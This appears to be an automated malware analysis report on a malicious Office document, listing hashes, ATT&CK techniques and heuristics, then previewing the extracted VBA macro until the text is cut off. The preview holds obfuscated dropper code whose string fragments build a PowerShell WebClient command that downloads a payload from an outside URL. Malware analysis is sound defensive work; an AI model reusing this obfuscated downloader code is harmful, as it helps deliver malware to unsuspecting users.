Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dec1650048f6af6c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 159.0 KB
First seen: 2017-12-24
MD5: 812b6a5a284450763c0977b6ac26a4e3
SHA-1: e35c8bdc8a458a5720b8c4ce05033a2c2925c9e4
SHA-256: dec1650048f6af6c70fad529bd356a7d112c053b25f1b4daf42d7026af2c4fed
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The OLE document contains VBA macros, including an AutoOpen function, which is designed to execute automatically upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting that the macro attempts to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or downloader role, likely used in phishing campaigns.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]
    OLE file is 162,816 bytes but its declared streams total only 24,543 bytes; 138,273 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff (high) [SE_PASSWORD_ARCHIVE_LURE]
    Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54708 bytes
SHA-256: 6893745c4e8cc02895a0c56ea0dec2593d0c385def9502ffb1d6d7fb93fffd1a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kXSIJjXw"
Function CHPFIHiQTjTW()
wjwOJEEbiJ = UCase("twmzmFp" + "IpGbrhVLXD" + "VMUTpmsFfvvHrR" + "jsTJHWpSGnzJ" + "XtANYBApY") + UCase("zNtzJcMiOKG" + "dsNvbju" + "jpciilvhj" + "QwIPVvNWfptFk" + "HXQHzdaTuJwHlO")
ZFwiXi = Mid("fTwsuQZwnTP4aZw-objeerp+erpc'+'t Syserp+erpte'+'rp+erpem.Net.e'+'rp+ekV+ekVerpWeberp+erpClierp+erpent;i3wnsaderp+erpasd erp+eekV+ekVrp= nerp+er'+'pewerp+erp-object random;i3erp+jY1zKDkGdq0mwomPrj6mzEi", 15, 163)
zJDXQsIPK = UCase("ritTnGRkj" + "YXLuFMcRP" + "lwzWiXWlwI" + "JsDjnjfsO" + "CBCzkMbdQZ") + UCase("WEdthWlQkf" + "YzOfHLRjzZACj" + "uXwKvHfjrnnapG" + "ubiqOcFl" + "EPMkbzW")
fWraiqpGPqP = UCase("XhfwYtJsN" + "RhFAEVbEcX" + "VnhGPzBw" + "NKwEIIOGMF" + "fDlivUTqoUDIrG") + UCase("tzsIwIu" + "IHjAsvHVsXZfRB" + "KvdLJwKCHzFOQN" + "JpkJcbM" + "auhzKlSbkr")
uSCaYc = UCase("GihzufCbOTR" + "uATtIsPEJj" + "aZbiVfMoPv" + "wnjYGLjHJEDEFd" + "tKCRlRZ") + UCase("HXTzjwBi" + "dzDfNkl" + "UBXQWUV" + "SlBlzJd" + "iYAnNCLHZB")
vjCQiURjQdn = Mid("5GCUU'+'HAR]36))ekV)  -rEpLACEekVzxpekV,7CvawA", 6, 35)
dvjPosaEYjW = UCase("iNSzkvwEcCnhqI" + "NjuIZYwbDQczz" + "oWUWSiprs" + "OiWkRnN" + "rVXijcSZjmPjI") + UCase("wnnjSKXdzWrutu" + "OJPDlIi" + "GqsEtvCbLsSji" + "lVDSOVBrliXYVd" + "dWnTuhp")
CsHfbJdTukH = UCase("FZYjaQOQPCt" + "CzsOKAtDTWjA" + "jwqRqPqUtQftE" + "VjsOUknwpUo" + "GjzIjtX") + UCase("rSXzYmDQJhNUF" + "YUaILQAkIV" + "qIJWljlWNjC" + "tphjXpIH" + "uhIdiaiHqG")
tzCjAsSb = UCase("WhdazNH" + "AIBVQvk" + "OlZkNAdRi" + "TjSuvEFXrzpfaj" + "dcLvDaRL") + UCase("OMSnqVELsDt" + "jGMzPtDkbiK" + "bjXSWiVBVqfjm" + "hVvinWmiu" + "wzohNaAfBY")
sHWBiLv = Mid("rO1CW[ChAR]36 -CrEPlACEekVerpekV,[ChAR]39)) ') -CrePLAcE  ([Char]68+[Char]88+[Char]57),[Char]36-CrePLAcE  'ekV',[Char]39))OOMz1q1", 6, 117)
ioKolSOOGH = UCase("CVidutXA" + "wsqVIjSdjdv" + "NJvbAtDFDPWctJ" + "HDmdRIfWCq" + "VBIEXNLJoMnCt") + UCase("UuYiWNc" + "ILawzirimtkNXB" + "zrJRjVLTBtdwOH" + "jdLXtwdaNhSGZ" + "RfdTwZrMwsdzrY")
bjlMjEUF = UCase("GwloOhrG" + "acKwLhpzvoGtp" + "TYqoouq" + "hNEaXJp" + "oucBwVnpVj") + UCase("DjNSTRwSQXtD" + "CZvztlKf" + "WzLQnDzl" + "TIInQUu" + "IZrZBvrQzWap")
LWXaD = UCase("zcPNpubaCNI" + "tuWPuLptb" + "BlcoMplDTWnE" + "TkSzWzlH" + "izUNJITzp") + UCase("wSbdlBh" + "pztlbpiCibOS" + "paiHfUwfcjVhiF" + "sHjwpLwHZtViiG" + "rjWHIrsWGhi")
mZVwiwtZfi = Mid("FXuziB8riub'-J'+'oiekV+'+'ekVn'+'erperp)( ((erpi3werp+erpfrerp+e'+'rpanc =ekV+ekV neerp+erpYhKhu1", 12, 80)
jjfVJHldh = UCase("jVFvNNHCiuUiXZ" + "DOJaCIckoiVDTA" + "jWvEjmCrDGnii" + "WudWvMlNAnn" + "kQNrKnCr") + UCase("ziTpJAXFT" + "awGSnrhYo" + "TWIQcBl" + "LwzjmRYLKjm" + "NHjXNJiw")
ncGCw = UCase("MQXDsjo" + "XuRdksTJ" + "JpUYwsmKa" + "BAkaPGGkrBpdvp" + "GwRtXQYjIwrOjN") + UCase("ltRnnKnUCX" + "IcHYjuicsvV" + "DjdQbiXrZ" + "TQvLHCmTcO" + "tHwbkQzkEU")
YkwGEMSwlZn = UCase("bfdjBZbSRIfWt" + "TRYMlrnXmdFC" + "OoinCzl" + "YIlrYwHIJzFtt" + "NJozTEDsz") + UCase("wUNdjVdXIvv" + "mUMsfPdf" + "JLAbYzC" + "jmfJHsEliYo" + "ilwSEXTmaZ")
FoJHdGJrok = Mid("6BHdwja1BL7ofAB'V+ekV+erptiekV+ekVerp+erpbeer.it/Cerp+erplerp+erpvRerp+erpA/erp+erpDTXerp+erp.'+'ekV+ekVSperp+ee'+'kV+ekVrplit(erp+erpDerp+erpTX,DTX);ierp+erp3'+'werp+erpkarapasemEQiYnnzpvMD", 16, 163)
NFZBE = UCase("QcNGJtLqffF" + "IrcUmbpZTGuK" + "horNZGUBrA" + "wAtsHmjqn" + "nkHwLIPvIJ") + UCase("DhcEUcGZkjRr" + "WliwSjWD" + "DtEjRNzFGi" + "kuTQnmKdRDlVs" + "aaaSdcnfjiiAkL")
KfjEBAHPXDu = UCase("PUdpIMCLVasbI" + "zicIHBqoK" + "XNiWBjQEH" + "QpiDwYbNTuqJqD" + "sriTXwa") + UCase("LRvijKpK" + "UJwKAYMiZdVQb" + "XiQIplkjA" + "fSlBtvCdkCpjE" + "rSSkwVFtkEXzQB")
DInSZNEv = UCase("BtkNNvscks" + "juCScElaPIMMcL" + "GdwTmDzOUjm" + "iYrnQOzazUGjT" + "aFNojHCmoOiQF") + UCase("jjimqRDCXUwwdk" + "mXRAwdrBjzi" + "wjdJzIFqRmUp" + "kXissii" + "ICrMQHQsi")
jiUzfYPLN = Mid("1HKLd5QB4RtFZN0mvS8uV+'erpekV+ekVwa'+'ekV+ekVerp+erpbc.ToString(
... (truncated)